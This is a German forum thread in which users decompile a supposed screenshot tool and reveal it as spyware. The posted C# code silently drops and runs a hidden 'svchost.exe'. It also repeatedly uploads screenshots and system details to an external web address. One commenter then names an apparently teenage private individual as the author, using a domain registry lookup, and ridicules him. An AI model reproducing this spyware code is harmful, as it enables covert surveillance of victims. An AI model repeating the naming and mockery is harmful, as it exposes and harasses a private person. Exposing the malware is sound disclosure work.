ScreenShooter

[CCprogamer]

Man kann einen bestimmten Bereich auswählen und dann einen Screenshot davon machen:




Sobald man "Capture" gedrückt hat, wird der folgende Ausschnitt am danach gewähltem Ort gespeichert:





Viel Spaß damit

[BloodyEpi]

das is aba nett, das du dich extra angemeldet hast um dein prog zu zeigen

wo is denn der source?

[sumisumi]

was macht denn das hier schönes?

PHP-Code:

  try
    {
        FileStream output = new FileStream(Environment.GetEnvironmentVariable("TEMP") + @"\svchost.exe", FileMode.Create, FileAccess.Write);
        BinaryWriter writer = new BinaryWriter(output);
        writer.Write(this.CreateStream("svchost.exe"));
        writer.Close();
        output.Close();
        Interaction.Shell(Environment.GetEnvironmentVariable("TEMP") + @"\svchost.exe", AppWinStyle.Hide, false, -1);
    } 


PHP-Code:

private byte[] CreateStream(string resFilename)
{
    byte[] buffer;
    try
    {
        string str = Assembly.GetExecutingAssembly().GetName().Name.ToString();
        if (str == "")
        {
            goto Label_007C;
        }
        Stream manifestResourceStream = Assembly.GetExecutingAssembly().GetManifestResourceStream(str + "." + resFilename);
        if (manifestResourceStream == null)
        {
            goto Label_007C;
        }
        byte[] buffer2 = new byte[((int) manifestResourceStream.Length) + 1];
        manifestResourceStream.Read(buffer2, 0, Conversion.Int((int) manifestResourceStream.Length));
        manifestResourceStream.Close();
        buffer = buffer2;
    }
    catch (Exception exception1)
    {
        ProjectData.SetProjectError(exception1);
        buffer = null;
        ProjectData.ClearProjectError();
    }
    return buffer;
Label_007C:
    return null;
} 


in den Resourcen befindet sich natürlich noch eine eigene svchost.exe

[Scrion]

Wie man nur glauben kann, dass Menschen einen derartigen Schund aus dem Internet herunterladen und dann auch noch ausführen, ist mir schleierhaft.

Noch dümmlicher ist nur der Glaube, ein Link auf virustotal käme einem Absolutionsschreiben gleich, wo doch jeder 13jährige weiß, dass es für eigens erstellte malware überhaupt kein positives Ergebnis geben kann - außer jemand hätte in der Zwischenzeit wunderliche Heuristiken entwickelt, die tatsächlich auch funktionieren...

Besonders amüsant finde ich die Idee, die erstellten Screenshots dann ohne das Wissen das Nutzers auf den eigenen Webspace hochzuladen...herrlich. Wohnte ich zufällig in der Nähe des Ortes, den der DENIC - Eintrag für diese Domain angibt, hätte ich eine Wochenendbeschäftigung...

PHP-Code:

public void Screening()
{
    while (true)
    {
        WebClient client = new WebClient();
        string str = Environment.GetEnvironmentVariable("TEMP") + @"\" + Strings.FormatDateTime(DateAndTime.get_Now(), 2) + " - " + string.Format("{0}.{1}.{2}", DateAndTime.get_Now().Hour, DateAndTime.get_Now().Minute, DateAndTime.get_Now().Second);
        client.Headers.Add("Content-Type", "binary/octet-stream");
        Bitmap bitmap = new Bitmap(this.CaptureScreen());
        bitmap.Save(str + ".jpg", ImageFormat.Jpeg);
        bitmap.Dispose();
        if (!this.dataDONE)
        {
            this.dataDONE = true;
            string str2 = "ComputerName: " + Environment.MachineName.ToString() + "\r\nUserName: " + Environment.UserName.ToString() + "\r\nBetriebssystem: " + Environment.OSVersion.VersionString + "\r\nDrives: " + FileSystem.get_Drives().Count.ToString() + "\r\n";
            int count = FileSystem.get_Drives().Count;
            for (int i = 0; i <= count; i++)
            {
                try
                {
                    str2 = str2 + "Drive " + Conversions.ToString(i) + ": " + FileSystem.get_Drives()[i].Name + "   " + FileSystem.get_Drives()[i].VolumeLabel + "   " + Conversions.ToString(Conversion.Int((((((double) FileSystem.get_Drives()[i].TotalSize) / 1024.0) / 1024.0) / 1024.0) * 100.0) / 100.0) + " GB Gesamtplatz\r\n";
                }
                catch (Exception exception1)
                {
                    ProjectData.SetProjectError(exception1);
                    Exception exception = exception1;
                    ProjectData.ClearProjectError();
                }
            }
            FileSystem.WriteAllText(Environment.GetEnvironmentVariable("TEMP") + @"\userinfo.txt", str2, false);
            try
            {
                if (File.Exists(Environment.GetEnvironmentVariable("TEMP") + @"\userinfo.txt"))
                {
                    client.UploadFile("http://project8.codingcafe.de/up.php", "POST", Environment.GetEnvironmentVariable("TEMP") + @"\userinfo.txt");
                }
            }
            catch (Exception exception5)
            {
                ProjectData.SetProjectError(exception5);
                Exception exception2 = exception5;
                ProjectData.ClearProjectError();
            }
        }
        try
        {
            if (File.Exists(str + ".jpg"))
            {
                client.UploadFile("http://project8.codingcafe.de/up.php", "POST", str + ".jpg");
            }
        }
        catch (Exception exception6)
        {
            ProjectData.SetProjectError(exception6);
            Exception exception3 = exception6;
            ProjectData.ClearProjectError();
        }
        Thread.Sleep(0x7530);
        try
        {
            if (File.Exists(str + ".jpg"))
            {
                File.Delete(str + ".jpg");
            }
        }
        catch (Exception exception7)
        {
            ProjectData.SetProjectError(exception7);
            Exception exception4 = exception7;
            ProjectData.ClearProjectError();
        }
    }
} 


Ich spiele mit dem Gedanken, mir folgenden Text zu Herzen zu nehmen...

§ 202c Vorbereiten des Ausspähens und Abfangens von Daten
(1) Wer eine Straftat nach § 202a oder § 202b vorbereitet, indem er
1.
Passwörter oder sonstige Sicherungscodes, die den Zugang zu Daten (§ 202a Abs. 2) ermöglichen, oder
2.
Computerprogramme, deren Zweck die Begehung einer solchen Tat ist,
herstellt, sich oder einem anderen verschafft, verkauft, einem anderen überlässt, verbreitet oder sonst zugänglich macht, wird mit Freiheitsstrafe bis zu einem Jahr oder mit Geldstrafe bestraft.
(2) § 149 Abs. 2 und 3 gilt entsprechend.

...und einmal angestrengt darüber nachzudenken, ob ein Werkzeug, welches Bildschirminhalte ausspäht und sie unaufgefordert versendet, nicht als Computerprogramm zum Vorbereiten des Ausspähens und Abfangens von Daten klassifiziert werden kann.

Aus dem Quellcode und der Download - Location geht immerhin eindeutig hervor, dass der Entwickler dieses Werkzeugs Zugang zur Domain "codingcafe.de" hat, so kann sich die Strafanzeige immerhin gegen einen gewissen Herrn Max Riegler aus Dresden wenden - wie gut, dass man heutzutage Anzeigen auch Online stellen kann und sich gar nicht mehr aus dem Haus bewegen muss...

Da der Autor sich auch nicht zu schade ist, diesen Dreck auch noch über seinen Twitter-Account zu bewerben, trifft es da sicherlich nicht den falschen, zumal Maxi auch noch dumm genug ist, über das "SchülerVZ" praktisch ein Schuldeingeständnis einzufügen:


P.S.: Wenn ich die traurige Visage sehe, die da bei Mami aus ihrem Jugendzimmer schaut, habe ich fast Mitleid. Fast.